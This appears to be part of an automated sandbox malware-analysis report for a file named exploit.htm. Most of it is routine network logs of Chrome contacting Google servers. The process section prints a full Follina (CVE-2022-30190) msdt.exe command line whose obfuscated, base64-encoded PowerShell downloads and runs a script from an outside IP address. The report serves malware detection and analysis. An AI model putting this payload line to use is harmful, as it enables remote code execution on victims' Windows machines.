                                                                                                                                                            Jun 16, 2022 00:21:39.173408031 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.173471928 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:39.174674034 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.175278902 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:39.175316095 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.175707102 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:39.175743103 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.210762024 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.210859060 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:39.210894108 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.211277008 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.211334944 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:39.212472916 CEST49723443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:39.212528944 CEST44349723142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.250644922 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.250730991 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:39.250771999 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.250873089 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:39.250937939 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:39.252367973 CEST49722443192.168.2.3172.217.168.45
                                                                                                                                                            Jun 16, 2022 00:21:39.252393961 CEST44349722172.217.168.45192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.332169056 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.332231045 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.332329035 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.341602087 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.341630936 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.395642996 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.395968914 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.396025896 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.396874905 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.397322893 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.397488117 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.397495985 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.440495014 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.451642036 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.451769114 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.451790094 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.451812029 CEST44349749142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.451881886 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:55.063725948 CEST49749443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:55.063767910 CEST44349749142.250.203.110192.168.2.3

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 16, 2022 00:21:38.802418947 CEST5641753192.168.2.38.8.8.8
                                                                                                                                                            Jun 16, 2022 00:21:38.804209948 CEST5592353192.168.2.38.8.8.8
                                                                                                                                                            Jun 16, 2022 00:21:38.830235004 CEST53564178.8.8.8192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:38.833127022 CEST53559238.8.8.8192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:42.550947905 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:42.580271006 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:42.880569935 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:43.180941105 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:43.781429052 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:44.699646950 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:44.742424011 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:44.860687017 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:44.860747099 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:44.890491009 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:44.890569925 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:44.890629053 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:44.890696049 CEST44349876142.250.203.110192.168.2.3
                                                                                                                                                            Jun 16, 2022 00:21:46.328716993 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.342454910 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:46.345200062 CEST49876443192.168.2.3142.250.203.110
                                                                                                                                                            Jun 16, 2022 00:21:52.514214039 CEST49876443192.168.2.3142.250.203.110

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jun 16, 2022 00:21:38.802418947 CEST192.168.2.38.8.8.80x8538Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                            Jun 16, 2022 00:21:38.804209948 CEST192.168.2.38.8.8.80x102fStandard query (0)accounts.google.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jun 16, 2022 00:21:38.830235004 CEST8.8.8.8192.168.2.30x8538No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Jun 16, 2022 00:21:38.830235004 CEST8.8.8.8192.168.2.30x8538No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)
                                                                                                                                                            Jun 16, 2022 00:21:38.833127022 CEST8.8.8.8192.168.2.30x102fNo error (0)accounts.google.com172.217.168.45A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • accounts.google.com
                                                                                                                                                            • clients2.google.com

                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.349722172.217.168.45443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-15 22:21:39 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                            Host: accounts.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 1
                                                                                                                                                            Origin: https://www.google.com
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2022-06-15 22:21:39 UTC0OUTData Raw: 20
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2022-06-15 22:21:39 UTC2INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                            Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Wed, 15 Jun 2022 22:21:39 GMT
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8OTXc0FzJQJWv1rypLBTjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                            Content-Security-Policy: script-src 'nonce-8OTXc0FzJQJWv1rypLBTjg' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                            Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                            Server: ESF
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2022-06-15 22:21:39 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                            Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                            2022-06-15 22:21:39 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.349723142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-15 22:21:39 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                            Host: clients2.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            X-Goog-Update-Interactivity: fg
                                                                                                                                                            X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                            X-Goog-Update-Updater: chromecrx-85.0.4183.121
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2022-06-15 22:21:39 UTC1INHTTP/1.1 200 OK
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce--Gjhs5084AHj81pkQ19PLg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Wed, 15 Jun 2022 22:21:39 GMT
                                                                                                                                                            Content-Type: text/xml; charset=UTF-8
                                                                                                                                                            X-Daynum: 5644
                                                                                                                                                            X-Daystart: 55299
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2022-06-15 22:21:39 UTC2INData Raw: 33 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 36 34 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 35 35 32 39 39 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                            Data Ascii: 31b<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5644" elapsed_seconds="55299"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                            2022-06-15 22:21:39 UTC2INData Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61
                                                                                                                                                            Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><a
                                                                                                                                                            2022-06-15 22:21:39 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.349749142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-06-15 22:21:46 UTC4OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1
                                                                                                                                                            Host: clients2.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            X-Goog-Update-Interactivity: fg
                                                                                                                                                            X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                            X-Goog-Update-Updater: chromecrx-85.0.4183.121
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2022-06-15 22:21:46 UTC5INHTTP/1.1 200 OK
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-mw1l0BEfnqR9Yi4RyxzRIw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Wed, 15 Jun 2022 22:21:46 GMT
                                                                                                                                                            Content-Type: text/xml; charset=UTF-8
                                                                                                                                                            X-Daynum: 5644
                                                                                                                                                            X-Daystart: 55306
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2022-06-15 22:21:46 UTC6INData Raw: 33 31 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 36 34 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 35 35 33 30 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                            Data Ascii: 31b<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5644" elapsed_seconds="55306"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                            2022-06-15 22:21:46 UTC6INData Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61
                                                                                                                                                            Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><a
                                                                                                                                                            2022-06-15 22:21:46 UTC7INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:00:21:35
                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\exploit.htm
                                                                                                                                                            Imagebase:0x7ff7f6290000
                                                                                                                                                            File size:2150896 bytes
                                                                                                                                                            MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:00:21:36
                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff7f6290000
                                                                                                                                                            File size:2150896 bytes
                                                                                                                                                            MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:00:22:37
                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                            Path:C:\Windows\System32\msdt.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
                                                                                                                                                            Imagebase:0x7ff6977e0000
                                                                                                                                                            File size:1560576 bytes
                                                                                                                                                            MD5 hash:8BE43BAF1F37DA5AB31A53CA1C07EE0C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.668056539.000001E93CA50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.667981258.000001E93C9C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Disassembly

                                                                                                                                                            No disassembly